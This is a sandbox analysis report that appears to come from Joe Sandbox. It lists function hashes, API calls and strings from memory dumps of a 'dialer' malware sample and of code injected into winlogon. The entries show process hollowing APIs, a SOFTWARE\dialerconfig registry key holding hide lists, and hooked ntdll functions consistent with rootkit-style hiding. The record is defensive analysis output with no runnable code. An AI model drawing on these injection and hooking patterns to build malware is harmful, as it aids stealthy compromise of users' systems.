                                                                                control_flow_graph for the function at 140001c88 (graph edge list and executed/not-executed legend omitted). API calls referenced in the graph, in graph order: CreateProcessW, VirtualAllocEx, WriteProcessMemory, OpenProcess, TerminateProcess, VirtualAlloc, GetThreadContext, SetThreadContext, ResumeThread.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                • String ID: @
                                                                                • API String ID: 3462610200-2766056989
                                                                                • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                                • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                • String ID: dialersvc64
                                                                                • API String ID: 4184240511-3881820561
                                                                                • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                                • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Delete$CloseEnumOpen
                                                                                • String ID: SOFTWARE\dialerconfig
                                                                                • API String ID: 3013565938-461861421
                                                                                • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                                • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: File$Write$CloseCreateHandle
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 148219782-3440882674
                                                                                • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                                • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 1646373207-2227199552
                                                                                • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                                • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                                Execution Graph

                                                                                Execution Coverage: 1.3%
                                                                                Dynamic/Decrypted Code Coverage: 94.4%
                                                                                Signature Coverage: 0%
                                                                                Total number of Nodes: 107
                                                                                Total number of Limit Nodes: 16
                                                                                execution_graph (graph edge list omitted). Root nodes: 1e858985cf0, 1e85895273c, 1e8589828c8, 1e858983ab9, 1e858981abc, 1e85898554d, 1e8589b273c. API calls referenced in the graph: SetThreadContext, VirtualProtect, FlushInstructionCache, VirtualFree, GetCurrentProcess, ResumeThread, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, VirtualAlloc, LoadLibraryA, StrCmpNIW, VirtualQuery, GetLastError, GetProcessHeap, Sleep, SleepEx, StrCmpIW, StrCmpW, RegOpenKeyExW, RegCloseKey, RegQueryInfoKeyW, RegEnumValueW. Internal functions named in the graph: __free_lconv_num, capture_previous_context.

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 21d86d412d1650ae27b0043b2d401094e46d8c624b6cd0b43ec9435d42789ffa
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: 2D710A36321A91C6EB10AF66E8916EDB3A5FF84B98F401132DE4E57B69EF38C454C740

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: d234e4461be7ce666b4697da3425b0a366aa51e2e4cc7be98c343ce9cae75724
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 05115B36724BC1C2EF159B22E4086ADB2A1FB88B85F44003ADE8E07794EF3DC505CB04

                                                                                Control-flow Graph

                                                                                control_flow_graph for the function at 1e858985b30 (graph edge list and executed/not-executed legend omitted). API calls referenced in the graph, in graph order: GetCurrentThreadId, GetThreadContext, VirtualProtect, FlushInstructionCache, SetThreadContext, ResumeThread.
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                • Instruction ID: a4617b46cd32b3a0414ab7f2d2c5e1ab313b6a71b2cba704dad36ec99b28e09a
                                                                                • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                • Instruction Fuzzy Hash: 9DD17776214B89C6DB709B56E49439EB7A0FB88B84F500126EE8D47BA9DF3CC545CF40

                                                                                Control-flow Graph

                                                                                control_flow_graph for the function at 1e8589850d0 (graph edge list and executed/not-executed legend omitted). API calls referenced in the graph: GetCurrentThreadId, VirtualProtect, GetLastError.
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                • Instruction ID: fa7807662b3792369c97fc6f37bebb2b001074cd7c6065ce50333d33d1213250
                                                                                • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                • Instruction Fuzzy Hash: 11029436229BC5C6EB60CB59E49079EB7A1F785794F104026EA8E87BA9DF7CC454CF00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocQuery
                                                                                • String ID:
                                                                                • API String ID: 31662377-0
                                                                                • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction ID: 5ad133b89d074dd97bec0c1f73fb02c24c1f243091b434175b3c7d6c02ead25a
                                                                                • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction Fuzzy Hash: E531EC32239AC5C1EA70DA15E85539EF6A4FB88784F500536EACE46BA8DF7DC5809F04

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: 9367effade6da1e612e9811c82477e14b03a08a888ac1948d4cbee7ffa7af72d
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: F41152716346C2C2FB60AB62F8493DDF294BF54385F90413FAD4E82995EF7CC0849A10

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 3733156554-0
                                                                                • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                • Instruction ID: 5a9e8cf37d9f90f00b28642c3c3ed99c7679eb8f6b8d0d5ae9ec7e4d6c0d13b2
                                                                                • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                • Instruction Fuzzy Hash: DFF01D76228B85C1D630DB51E44038EBBA0FB887D4F140122BE8D43B69CE3CC5808F00

                                                                                Control-flow Graph

                                                                                Control-flow graph of 1e85895273c-1e8589529d0 (rendered graph and raw edge list omitted; block summary kept): the entry block calls 1e8589529d4 four times, then three consecutive checks each branch to the exit block 1e8589529b2; the VirtualAlloc block at 1e8589527c5 also has an edge to that exit; a tight loop follows at 1e85895280e-1e858952836; LoadLibraryA at 1e858952858 sits inside a loop (1e858952858-1e8589528d9) that comes back to the LoadLibraryA block; a second loop spans 1e858952907-1e85895298c; all paths end in the return block 1e8589529b4-1e8589529d0.
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                • String ID:
                                                                                • API String ID: 3550616410-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 664efa2306450b3d651c980b7901db96b5cccce9d6076fff7dea8f6b8d110b4a
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 3261CC72B21690C7DA548F95D1207ADF3A2FF54BA5F588132DE5D07788DE38D852C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000001E858981628: GetProcessHeap.KERNEL32 ref: 000001E858981633
                                                                                  • Part of subcall function 000001E858981628: HeapAlloc.KERNEL32 ref: 000001E858981642
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816B2
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816DF
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589816F9
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981719
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981734
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981754
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898176F
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898178F
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817AA
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589817CA
                                                                                • Sleep.KERNEL32 ref: 000001E858981AD7
                                                                                • SleepEx.KERNELBASE ref: 000001E858981ADD
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817E5
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981805
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981820
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981840
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898185B
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898187B
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981896
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589818A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: 4bfe8da4bf64d09d75688e0bc86698689cfa1098149370d4ad6d534f2979ed62
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: D7317771231AC2D6EB50BB26DA513FDF3A9AF84BD0F0454339E0D87699FE24C8918A10

                                                                                Control-flow Graph

                                                                                Control-flow graph of 1e8589b273c-1e8589b29d0 (rendered graph and raw edge list omitted; block summary kept): the block boundaries match the function at 1e85895273c in the 1e858950000 region offset for offset (entry calls 1e8589b29d4 four times, three checks and the VirtualAlloc block at 1e8589b27c5 branch to the exit 1e8589b29b2, loops at 1e8589b280e-1e8589b2836, 1e8589b2858-1e8589b28d9 and 1e8589b2907-1e8589b298c, return block 1e8589b29b4-1e8589b29d0); in this copy the block at 1e8589b2858 carries no resolved LoadLibraryA call.
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: c921608bc3ed8dae174af04d789195309c5edfcc0c714fa749226a5546365456
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 7161DD32B29690CBEB548F95D1007ADF3A2FB54BA5F588136DE5D07788DE38D852C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: 04a661148b50104311287319c74e3cfe1c909468e327bc71e4abbcab7385a8c3
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: A6B15476220AD2C6EB699FA5D8407EDF3A5FB84B84F445027EE0D57B95EE35C880CB40
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: c25654e1fbf133ad71a07c6f0efe47fc9d8043adbf42997a59493c9db71f9faa
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 41313B76225BC1DAEB609F60E8807EDB365FB84744F44442ADA4E57B99EF38C648CB10
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 0fd8bee66b9aa75a719588d4164310d191915e835c40ed0449f42a8a8d7cafff
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: A5313D36224BC1D6EB60DB25E8403EEB3A4FB89754F500126EE9D53B59DF38C555CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: 34985af1e6a69c2e887ac8394de09c6f631af6656f7e96728bd996360b5e390c
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: 7D111C36720F91C9EB109B60E8553AD73A4FB19758F440E32DE6E467A4DF78D1988380
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                • Instruction ID: 30bb9f7e9d87a9d9c65bc2380062ff3bad17e1f141d89e57fb0a08f8465aebfb
                                                                                • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                • Instruction Fuzzy Hash: C551B5327246D1D9FB209B72E8407EEBBA5FB84794F144126EE9D67B95DE38C501CB00
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
• Instruction ID: 1e72e37fc9f235eb4f944ff72101e8db7dacc5524e3e801771df4715c73e88ad
• Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
• Instruction Fuzzy Hash: 1BF0F4716356948EDB988F69E443759B7A1F748384FD0812ADA8EC3A14DB3C8455CF14

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
• Instruction ID: c2281e23739868d66036d4294d6c0683aafed4b8ecad6af3162b140505f798a1
• Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
• Instruction Fuzzy Hash: 4E512B36224BC5C6EB65DF62E54439EB7A2FB89BD9F044126DE4A07768EF38C0458B00

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563
• Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
• Instruction ID: eae4a35ccf18d1ff6c879c1ad54c2bd4091f653bf096b8bfe55e41d2011e4d15
• Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
• Instruction Fuzzy Hash: 35316074130ACBE0EA45EBA9EDA16ECF322FF84344F8050339C1D12565AF788289CB50

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
• API String ID: 190073905-1786718095
• Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction ID: 5a678c2123d8270ec6fb616ddb0a075a8484000318cf7b7c2c8d3db3c22f7b07
• Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction Fuzzy Hash: 2E818B316282C1CEFB92AB65D8413DDF6A0EF85B82F5481379E8D87796DF39E8458700

Control-flow Graph

APIs
Strings
Memory Dump Source
